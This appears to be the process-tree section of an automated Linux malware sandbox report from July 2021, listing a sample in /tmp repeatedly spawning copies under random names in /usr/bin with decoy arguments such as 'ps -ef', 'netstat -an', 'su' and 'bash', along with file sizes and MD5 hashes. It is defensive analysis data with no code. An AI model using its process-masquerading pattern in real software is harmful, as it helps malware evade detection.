                                                                                Start time:00:23:46
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/jjltawydwf
                                                                                Arguments:n/a
                                                                                File size:625900 bytes
                                                                                MD5 hash:8031cb3d4fe5ba13e55be0286e251729

                                                                                General

                                                                                Start time:00:23:46
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:23:46
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:23:46
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/jjltawydwf
                                                                                Arguments:/usr/bin/jjltawydwf "sleep 1" 4554
                                                                                File size:625900 bytes
                                                                                MD5 hash:8031cb3d4fe5ba13e55be0286e251729

                                                                                General

                                                                                Start time:00:23:46
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/jjltawydwf
                                                                                Arguments:n/a
                                                                                File size:625900 bytes
                                                                                MD5 hash:8031cb3d4fe5ba13e55be0286e251729

                                                                                General

                                                                                Start time:00:23:46
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:23:46
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:23:46
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/jjltawydwf
                                                                                Arguments:/usr/bin/jjltawydwf "ps -ef" 4554
                                                                                File size:625900 bytes
                                                                                MD5 hash:8031cb3d4fe5ba13e55be0286e251729

                                                                                General

                                                                                Start time:00:23:46
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/jjltawydwf
                                                                                Arguments:n/a
                                                                                File size:625900 bytes
                                                                                MD5 hash:8031cb3d4fe5ba13e55be0286e251729

                                                                                General

                                                                                Start time:00:23:46
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:23:46
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:23:46
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/jjltawydwf
                                                                                Arguments:/usr/bin/jjltawydwf pwd 4554
                                                                                File size:625900 bytes
                                                                                MD5 hash:8031cb3d4fe5ba13e55be0286e251729

                                                                                General

                                                                                Start time:00:23:46
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/jjltawydwf
                                                                                Arguments:n/a
                                                                                File size:625900 bytes
                                                                                MD5 hash:8031cb3d4fe5ba13e55be0286e251729

                                                                                General

                                                                                Start time:00:23:52
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:23:52
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:23:52
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/ouhdchrbdz
                                                                                Arguments:/usr/bin/ouhdchrbdz sh 4554
                                                                                File size:625900 bytes
                                                                                MD5 hash:464ee2d18facafa159f9948ab174135c

                                                                                General

                                                                                Start time:00:23:52
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/ouhdchrbdz
                                                                                Arguments:n/a
                                                                                File size:625900 bytes
                                                                                MD5 hash:464ee2d18facafa159f9948ab174135c

                                                                                General

                                                                                Start time:00:23:52
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:23:52
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:23:52
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/ouhdchrbdz
                                                                                Arguments:/usr/bin/ouhdchrbdz whoami 4554
                                                                                File size:625900 bytes
                                                                                MD5 hash:464ee2d18facafa159f9948ab174135c

                                                                                General

                                                                                Start time:00:23:52
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/ouhdchrbdz
                                                                                Arguments:n/a
                                                                                File size:625900 bytes
                                                                                MD5 hash:464ee2d18facafa159f9948ab174135c

                                                                                General

                                                                                Start time:00:23:52
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:23:52
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:23:52
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/ouhdchrbdz
                                                                                Arguments:/usr/bin/ouhdchrbdz "echo \"find\"" 4554
                                                                                File size:625900 bytes
                                                                                MD5 hash:464ee2d18facafa159f9948ab174135c

                                                                                General

                                                                                Start time:00:23:52
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/ouhdchrbdz
                                                                                Arguments:n/a
                                                                                File size:625900 bytes
                                                                                MD5 hash:464ee2d18facafa159f9948ab174135c

                                                                                General

                                                                                Start time:00:23:52
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:23:52
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:23:52
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/ouhdchrbdz
                                                                                Arguments:/usr/bin/ouhdchrbdz "netstat -antop" 4554
                                                                                File size:625900 bytes
                                                                                MD5 hash:464ee2d18facafa159f9948ab174135c

                                                                                General

                                                                                Start time:00:23:52
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/ouhdchrbdz
                                                                                Arguments:n/a
                                                                                File size:625900 bytes
                                                                                MD5 hash:464ee2d18facafa159f9948ab174135c

                                                                                General

                                                                                Start time:00:23:52
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:23:52
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:23:52
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/ouhdchrbdz
                                                                                Arguments:/usr/bin/ouhdchrbdz "grep \"A\"" 4554
                                                                                File size:625900 bytes
                                                                                MD5 hash:464ee2d18facafa159f9948ab174135c

                                                                                General

                                                                                Start time:00:23:52
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/ouhdchrbdz
                                                                                Arguments:n/a
                                                                                File size:625900 bytes
                                                                                MD5 hash:464ee2d18facafa159f9948ab174135c

                                                                                General

                                                                                Start time:00:23:57
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:23:57
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:23:57
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/fcxqfstrdm
                                                                                Arguments:/usr/bin/fcxqfstrdm "netstat -an" 4554
                                                                                File size:625900 bytes
                                                                                MD5 hash:e45d3c3ceb20cb21cecdf27abb364096

                                                                                General

                                                                                Start time:00:23:57
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/fcxqfstrdm
                                                                                Arguments:n/a
                                                                                File size:625900 bytes
                                                                                MD5 hash:e45d3c3ceb20cb21cecdf27abb364096

                                                                                General

                                                                                Start time:00:23:57
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:23:57
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:23:57
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/fcxqfstrdm
                                                                                Arguments:/usr/bin/fcxqfstrdm uptime 4554
                                                                                File size:625900 bytes
                                                                                MD5 hash:e45d3c3ceb20cb21cecdf27abb364096

                                                                                General

                                                                                Start time:00:23:57
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/fcxqfstrdm
                                                                                Arguments:n/a
                                                                                File size:625900 bytes
                                                                                MD5 hash:e45d3c3ceb20cb21cecdf27abb364096

                                                                                General

                                                                                Start time:00:23:57
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:23:57
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:23:57
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/fcxqfstrdm
                                                                                Arguments:/usr/bin/fcxqfstrdm pwd 4554
                                                                                File size:625900 bytes
                                                                                MD5 hash:e45d3c3ceb20cb21cecdf27abb364096

                                                                                General

                                                                                Start time:00:23:57
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/fcxqfstrdm
                                                                                Arguments:n/a
                                                                                File size:625900 bytes
                                                                                MD5 hash:e45d3c3ceb20cb21cecdf27abb364096

                                                                                General

                                                                                Start time:00:23:57
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:23:57
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:23:57
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/fcxqfstrdm
                                                                                Arguments:/usr/bin/fcxqfstrdm bash 4554
                                                                                File size:625900 bytes
                                                                                MD5 hash:e45d3c3ceb20cb21cecdf27abb364096

                                                                                General

                                                                                Start time:00:23:57
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/fcxqfstrdm
                                                                                Arguments:n/a
                                                                                File size:625900 bytes
                                                                                MD5 hash:e45d3c3ceb20cb21cecdf27abb364096

                                                                                General

                                                                                Start time:00:23:58
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:23:58
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:23:58
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/fcxqfstrdm
                                                                                Arguments:/usr/bin/fcxqfstrdm ifconfig 4554
                                                                                File size:625900 bytes
                                                                                MD5 hash:e45d3c3ceb20cb21cecdf27abb364096

                                                                                General

                                                                                Start time:00:23:58
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/fcxqfstrdm
                                                                                Arguments:n/a
                                                                                File size:625900 bytes
                                                                                MD5 hash:e45d3c3ceb20cb21cecdf27abb364096

                                                                                General

                                                                                Start time:00:24:03
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:03
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:03
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/dxeguomyxc
                                                                                Arguments:/usr/bin/dxeguomyxc "sleep 1" 4554
                                                                                File size:625900 bytes
                                                                                MD5 hash:066caa157c95faa9d8d81929f8157d3a

                                                                                General

                                                                                Start time:00:24:03
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/dxeguomyxc
                                                                                Arguments:n/a
                                                                                File size:625900 bytes
                                                                                MD5 hash:066caa157c95faa9d8d81929f8157d3a

                                                                                General

                                                                                Start time:00:24:03
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:03
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:03
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/dxeguomyxc
                                                                                Arguments:/usr/bin/dxeguomyxc "ifconfig eth0" 4554
                                                                                File size:625900 bytes
                                                                                MD5 hash:066caa157c95faa9d8d81929f8157d3a

                                                                                General

                                                                                Start time:00:24:03
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/dxeguomyxc
                                                                                Arguments:n/a
                                                                                File size:625900 bytes
                                                                                MD5 hash:066caa157c95faa9d8d81929f8157d3a

                                                                                General

                                                                                Start time:00:24:03
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:03
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:03
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/dxeguomyxc
                                                                                Arguments:/usr/bin/dxeguomyxc "netstat -an" 4554
                                                                                File size:625900 bytes
                                                                                MD5 hash:066caa157c95faa9d8d81929f8157d3a

                                                                                General

                                                                                Start time:00:24:03
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/dxeguomyxc
                                                                                Arguments:n/a
                                                                                File size:625900 bytes
                                                                                MD5 hash:066caa157c95faa9d8d81929f8157d3a

                                                                                General

                                                                                Start time:00:24:03
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:03
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:03
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/dxeguomyxc
                                                                                Arguments:/usr/bin/dxeguomyxc top 4554
                                                                                File size:625900 bytes
                                                                                MD5 hash:066caa157c95faa9d8d81929f8157d3a

                                                                                General

                                                                                Start time:00:24:03
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/dxeguomyxc
                                                                                Arguments:n/a
                                                                                File size:625900 bytes
                                                                                MD5 hash:066caa157c95faa9d8d81929f8157d3a

                                                                                General

                                                                                Start time:00:24:03
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:03
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:03
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/dxeguomyxc
                                                                                Arguments:/usr/bin/dxeguomyxc ls 4554
                                                                                File size:625900 bytes
                                                                                MD5 hash:066caa157c95faa9d8d81929f8157d3a

                                                                                General

                                                                                Start time:00:24:03
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/dxeguomyxc
                                                                                Arguments:n/a
                                                                                File size:625900 bytes
                                                                                MD5 hash:066caa157c95faa9d8d81929f8157d3a

                                                                                General

                                                                                Start time:00:24:09
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:09
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:09
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/ctrygxclrx
                                                                                Arguments:/usr/bin/ctrygxclrx su 4554
                                                                                File size:625900 bytes
                                                                                MD5 hash:039a6eceafdbf298ac52c2a12463d087

                                                                                General

                                                                                Start time:00:24:09
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/ctrygxclrx
                                                                                Arguments:n/a
                                                                                File size:625900 bytes
                                                                                MD5 hash:039a6eceafdbf298ac52c2a12463d087

                                                                                General

                                                                                Start time:00:24:09
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:09
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:09
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/ctrygxclrx
                                                                                Arguments:/usr/bin/ctrygxclrx "ifconfig eth0" 4554
                                                                                File size:625900 bytes
                                                                                MD5 hash:039a6eceafdbf298ac52c2a12463d087

                                                                                General

                                                                                Start time:00:24:09
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/ctrygxclrx
                                                                                Arguments:n/a
                                                                                File size:625900 bytes
                                                                                MD5 hash:039a6eceafdbf298ac52c2a12463d087

                                                                                General

                                                                                Start time:00:24:09
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:09
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:09
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/ctrygxclrx
                                                                                Arguments:/usr/bin/ctrygxclrx "netstat -an" 4554
                                                                                File size:625900 bytes
                                                                                MD5 hash:039a6eceafdbf298ac52c2a12463d087

                                                                                General

                                                                                Start time:00:24:09
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/ctrygxclrx
                                                                                Arguments:n/a
                                                                                File size:625900 bytes
                                                                                MD5 hash:039a6eceafdbf298ac52c2a12463d087

                                                                                General

                                                                                Start time:00:24:09
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:09
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:09
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/ctrygxclrx
                                                                                Arguments:/usr/bin/ctrygxclrx "grep \"A\"" 4554
                                                                                File size:625900 bytes
                                                                                MD5 hash:039a6eceafdbf298ac52c2a12463d087

                                                                                General

                                                                                Start time:00:24:09
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/ctrygxclrx
                                                                                Arguments:n/a
                                                                                File size:625900 bytes
                                                                                MD5 hash:039a6eceafdbf298ac52c2a12463d087

                                                                                General

                                                                                Start time:00:24:09
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:09
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:09
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/ctrygxclrx
                                                                                Arguments:/usr/bin/ctrygxclrx "sleep 1" 4554
                                                                                File size:625900 bytes
                                                                                MD5 hash:039a6eceafdbf298ac52c2a12463d087

                                                                                General

                                                                                Start time:00:24:09
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/ctrygxclrx
                                                                                Arguments:n/a
                                                                                File size:625900 bytes
                                                                                MD5 hash:039a6eceafdbf298ac52c2a12463d087

                                                                                General

                                                                                Start time:00:24:14
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:14
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:14
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/gqczobuacc
                                                                                Arguments:/usr/bin/gqczobuacc "grep \"A\"" 4554
                                                                                File size:625900 bytes
                                                                                MD5 hash:c098c27688a125d5cfa970ae835e1eda

                                                                                General

                                                                                Start time:00:24:14
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/gqczobuacc
                                                                                Arguments:n/a
                                                                                File size:625900 bytes
                                                                                MD5 hash:c098c27688a125d5cfa970ae835e1eda

                                                                                General

                                                                                Start time:00:24:14
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:14
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:14
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/gqczobuacc
                                                                                Arguments:/usr/bin/gqczobuacc "sleep 1" 4554
                                                                                File size:625900 bytes
                                                                                MD5 hash:c098c27688a125d5cfa970ae835e1eda

                                                                                General

                                                                                Start time:00:24:14
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/gqczobuacc
                                                                                Arguments:n/a
                                                                                File size:625900 bytes
                                                                                MD5 hash:c098c27688a125d5cfa970ae835e1eda

                                                                                General

                                                                                Start time:00:24:14
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:14
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:14
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/gqczobuacc
                                                                                Arguments:/usr/bin/gqczobuacc su 4554
                                                                                File size:625900 bytes
                                                                                MD5 hash:c098c27688a125d5cfa970ae835e1eda

                                                                                General

                                                                                Start time:00:24:14
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/gqczobuacc
                                                                                Arguments:n/a
                                                                                File size:625900 bytes
                                                                                MD5 hash:c098c27688a125d5cfa970ae835e1eda

                                                                                General

                                                                                Start time:00:24:14
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:14
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:15
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/gqczobuacc
                                                                                Arguments:/usr/bin/gqczobuacc "netstat -an" 4554
                                                                                File size:625900 bytes
                                                                                MD5 hash:c098c27688a125d5cfa970ae835e1eda

                                                                                General

                                                                                Start time:00:24:15
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/gqczobuacc
                                                                                Arguments:n/a
                                                                                File size:625900 bytes
                                                                                MD5 hash:c098c27688a125d5cfa970ae835e1eda

                                                                                General

                                                                                Start time:00:24:15
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:15
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:15
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/gqczobuacc
                                                                                Arguments:/usr/bin/gqczobuacc "ps -ef" 4554
                                                                                File size:625900 bytes
                                                                                MD5 hash:c098c27688a125d5cfa970ae835e1eda

                                                                                General

                                                                                Start time:00:24:15
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/gqczobuacc
                                                                                Arguments:n/a
                                                                                File size:625900 bytes
                                                                                MD5 hash:c098c27688a125d5cfa970ae835e1eda

                                                                                General

                                                                                Start time:00:24:20
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:20
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:20
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/uoewtvxqdd
                                                                                Arguments:/usr/bin/uoewtvxqdd "ps -ef" 4554
                                                                                File size:625900 bytes
                                                                                MD5 hash:39aa00025c468148f76c1297ae9e076e

                                                                                General

                                                                                Start time:00:24:20
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/uoewtvxqdd
                                                                                Arguments:n/a
                                                                                File size:625900 bytes
                                                                                MD5 hash:39aa00025c468148f76c1297ae9e076e

                                                                                General

                                                                                Start time:00:24:20
                                                                                Start date:20/07/2021
